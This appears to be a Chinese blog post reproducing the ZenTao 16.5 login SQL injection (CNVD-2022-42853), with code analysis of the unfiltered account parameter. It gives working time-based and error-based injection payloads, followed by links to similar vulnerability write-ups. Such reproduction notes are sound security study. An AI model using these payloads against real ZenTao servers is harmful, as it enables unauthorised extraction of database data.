禅道V16.5SQL注入漏洞(CNVD-2022-42853)

最新推荐文章于 2024-04-06 04:32:41 发布
最新推荐文章于 2024-04-06 04:32:41 发布
阅读量762 收藏 2
点赞数
分类专栏: 代码审计与分析 文章标签: 漏洞分析 web安全 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RestoreJustice/article/details/129735407
版权

禅道V16.5SQL注入漏洞(CNVD-2022-42853)

一、简介

禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行,攻击者可利用漏洞获取数据库敏感信息。

复现码源下载:https://www.zentao.net/dynamic/zentaopms16.0.beta1-80443.html

参考:https://github.com/ce-automne/CNVD-2022-42853

二、影响范围

禅道企业版 6.5
禅道旗舰版 3.0
禅道开源版 16.5
禅道开源版 16.5.beta1

三、漏洞分析

利用网上公开的报错注入poc,发现漏洞点

在这里插入图片描述

具体函数为**setVision()**

对输入的用户名没有任何过滤就直接传入SQL语句中执行

在这里插入图片描述

而且$account变量支持$_GET$_POST两种方法传参,可以在前台sql注入

paylad

延时:
http://ip:port/index.php?account=admin' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))a)-- b

报错(POST传入)
POST /zentao/user-login.html HTTP/1.1
payload:account=admin'+and++updatexml(1,concat(0x1,user()),1)+and+'1'='1

注入成功

cat(0x1,user()),1)+and+‘1’='1


注入成功

![在这里插入图片描述](https://img-blog.csdnimg.cn/3ebfd9658d7d4907a5109729460f9955.png)
禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞
nnn2188185的博客
04-13 702
禅道 11.6 zentao/api-getModel-api-sql-sql 版本中对用户接口调用权限过滤不完善,导致调用接口存在SQL注入漏洞
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现
王-哪跑的博客
02-27 4716
1.向日葵介绍 [向日葵远程控制]是一款提供远程控制服务的软件。其支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备。整个远控过程,可通过浏览器直接进行,无需再安装软件。 2.漏洞描述 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制
禅道 16.5 router.class.php SQL注入漏洞复现】
weixin_45530380的博客
08-14 573
【代码】【禅道 16.5 router.class.php SQL注入漏洞复现】
禅道16.5 SQL注入(CNVD-2022-42853)
qq_50854662的博客
02-15 1021
禅道16.5 SQL注入(CNVD-2022-42853)
sql注入合集_禅道sql注入(2),妈妈再也不用担心我找工作了
m0_61369360的博客
04-06 589
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
向日葵漏洞扫描工具 CNVD-2022-10270
03-05
向日葵漏洞扫描工具
SQL注入漏洞原理分析
06-21
SQL注入漏洞原理分析
禅道linux一键安装漏洞,禅道免登陆SQL注入漏洞复现
weixin_39552768的博客
05-17 1404
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取webshe...
sql注入合集
Aiwin的博客
05-08 998
sql注入合集,持续收集。
sql注入合集_禅道sql注入(1),网络安全开发究竟该如何学习
m0_61369360的博客
04-06 575
class block extends control { public function __construct($moduleName = ‘’, KaTeX parse error: Expected '}', got 'EOF' at end of input: …:\_\_construct(moduleName, $methodName); this−>selfCall=strpos(this->selfCall = strpos(this−>selfCall=strpos(this->serv
sql注入合集_禅道sql注入,2024-2024蚂蚁金服网络安全面试真题解析
最新发布
m0_61369360的博客
04-06 854
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sql注入攻击linux下的xampp网站,从SQL注入到Getshell:记一次禅道系统的渗透
weixin_32830601的博客
05-14 551
SQL注入分析网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2.1也存在此问题,(2018.3.2号看到目前最新版本是9.8.1)。出问题的地方是此文件的orderBy函数:\lib\base\dao\dao.class.php对于limit后未做严格的过滤与判断,然后拼接到了order by后面导致产生注入.$order = join(',', $orders) . ' '...
禅道项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 3426
禅道是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。
limit 后注入_从SQL注入到Getshell:记一次禅道系统的渗透
weixin_39605326的博客
11-29 175
此过程为某站点的渗透记录,过程一波三折,但归根结底都是粗心大意造成的,不过自我认为在这个排坑的过程中也学习到了很多。确认版本首先可以通过接口来确认一下当前禅道的版本。http://example.com/index.php?mode=getconfigSQL注入分析网上之前有过一个9.1.2的orderBy函数的分析,但是没想到9.2.1也存在此问题,(2018.3.2号看到目前最新版本是9.8....
禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
weixin_30781567的博客
05-17 906
禅道全版本rce漏洞复现笔记漏洞说明禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所...
cnvd-2023-69477
12-08
cnvd-2023-69477是一个由国家信息安全漏洞共享平台发布的漏洞通告编号,该漏洞通告是针对特定软件或硬件产品的安全漏洞描述和修复建议的一个标识。根据cnvd-2023-69477的描述,这个漏洞可能会导致系统的信息泄露、拒绝服务或者远程代码执行等安全风险。建议用户及时关注厂商发布的安全补丁,并严格按照厂商提供的修复建议进行操作,确保系统的安全性。 对于系统管理员和安全工程师来说,他们需要关注cnvd-2023-69477的具体描述和风险评估,及时评估自身系统是否受到影响,快速制定修复计划并进行安全补丁的安装和验证。同时,建议关注该漏洞的后续动态,以便获取更多关于漏洞的详细信息和最新修复方案,及时做好安全防护工作。 总之,cnvd-2023-69477作为一个漏洞通告,提醒着用户和安全从业人员关注系统安全,及时采取措施保护系统,防范潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值